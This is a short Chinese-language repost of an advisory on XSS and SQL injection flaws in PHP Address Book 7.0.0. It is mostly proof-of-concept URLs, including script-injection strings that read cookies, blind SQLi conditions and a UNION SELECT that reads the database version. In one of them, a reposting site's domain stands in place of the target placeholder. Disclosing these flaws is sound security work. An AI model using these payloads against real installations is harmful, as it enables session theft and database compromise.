标题: PHP Address Book 7.0.0 Multiple security vulnerabilities 作者: Stefan Schurtz 受影响软件: Successfully tested on PHP Address Book 7.0.0 开发者网站: http://sourceforge.net/projects/php-addressbook/ 缺陷描述 PHP Address Book 7.0.0含多个 XSS 和 SQLi缺陷 测试方法 // XSS http://[target]/addressbookv7.0.0/preferences.php?from='"</script><script>alert('xss')</script> http://www.2cto.com /addressbookv7.0.0/group.php/" /><script> alert('xss')</script> http://[target]/addressbookv7.0.0/index.php?group='"</script><script>alert(document.cookie)</script> // SQLi http://[target]/addressbookv7.0.0/edit.php?id=1 AND 1=IF(1<2,2,1) http://[target]/addressbookv7.0.0/edit.php?id=1 AND 1=IF(1>2,2,1) // UNION-based Injection, needs 'magic_quotes=off' http://[target]/addressbookv7.0.0/view.php?id=1' UNION ALL SELECT NULL, NULL, version(), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL--+ 修复: 加强过滤
查看更多关于PHP Address Book 7.0.0多个缺陷及修复 - 网站安全 - 自的详细内容...